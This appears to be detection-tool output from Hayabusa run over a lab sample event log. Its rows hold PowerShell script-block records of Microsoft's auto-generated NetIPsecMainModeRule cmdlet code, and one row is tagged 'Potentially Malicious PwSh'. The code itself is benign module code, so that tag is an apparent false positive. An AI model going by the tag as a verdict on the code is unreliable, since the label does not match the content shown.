[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and 
config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } 
